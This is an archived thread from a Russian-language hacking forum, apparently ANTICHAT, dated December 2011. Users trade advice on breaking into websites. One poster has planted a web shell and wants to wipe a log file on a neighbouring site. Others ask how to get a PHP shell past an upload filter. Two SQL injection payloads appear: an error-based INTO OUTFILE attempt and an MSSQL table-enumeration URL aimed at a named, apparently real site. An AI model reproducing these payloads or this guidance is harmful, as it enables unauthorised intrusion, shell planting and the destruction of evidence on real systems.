ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

22.12.2011, 15:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 225312
Репутация:
-6
|
|
Сообщение от alerondel
alerondel said:
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.
/thread296327.html
|
|
|
|

23.12.2011, 00:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 10263
Репутация:
0
|
|
подскажите как залить шел. если при залитии картинкой он переименовывается
|
|
|
|

23.12.2011, 00:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от namez2
namez2 said:
подскажите как залить шел. если при залитии картинкой он переименовывается
как переименовывается? и как ты заливаешь?
что за cms?
|
|
|
|

23.12.2011, 00:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 10263
Репутация:
0
|
|
видимо самописная. заливаю name.php.jpg пишет что залился но судя по всему уже получается newname.jpg и открываться не хотит...
|
|
|
|

23.12.2011, 00:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 149611
Репутация:
81
|
|
Сообщение от namez2
namez2 said:
видимо самописная. заливаю name.php.jpg пишет что залился но судя по всему уже получается newname.jpg и открываться не хотит...
Через такую систему думаю никак, т.к она сама потом переименовывает независимо от того, какое название. Но, возможно, есть функция "переименовать" и т.п
|
|
|
|

23.12.2011, 13:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 14597
Репутация:
0
|
|
Не получается залить шел. Хотя путь к директории сайта знаю и привилегия на файл mysql пользователя YES. Может прав нет к папке www? как действовать?
|
|
|
|

23.12.2011, 14:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 90728
Репутация:
62
|
|
Сообщение от snet
snet said:
Не получается залить шел. Хотя путь к директории сайта знаю и привилегия на файл mysql пользователя YES. Может прав нет к папке www? как действовать?
для начала нужно показать нам как именно ты пытаешься это сделать.
|
|
|
|

23.12.2011, 14:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 14597
Репутация:
0
|
|
Сообщение от Чакэ
Чакэ said:
для начала нужно показать нам как именно ты пытаешься это сделать.
Через скуль инъекцию в пост запросе.
Код:
Code:
1' and (select 1 from(select count(*),concat((SELECT "" INTO OUTFILE "/адрес/файл.php"),floor(rand(0)*2 ))x from information_schema.tables group by x)a); --
|
|
|
|

23.12.2011, 16:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от snet
snet said:
Через скуль инъекцию в пост запросе.
Код:
Code:
1' and (select 1 from(select count(*),concat((SELECT "" INTO OUTFILE "/адрес/файл.php"),floor(rand(0)*2 ))x from information_schema.tables group by x)a); --
через еррор-бейсед нельзя залить шелл
|
|
|
|

23.12.2011, 17:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 35174
Репутация:
-6
|
|
Код:
Code:
https://ventosavineyardscom.terrasite.com/cart.asp?Add=1+and%201=%28select%20top%201%20table_name%20from%20information.schema.tables%20where%20Table_name%20not%20in%20%28%27Events%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27%29%29
No admin table?
Always this error:
Код:
Code:
Incorrect syntax near the keyword 'schema'.
Only schema showing, why?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|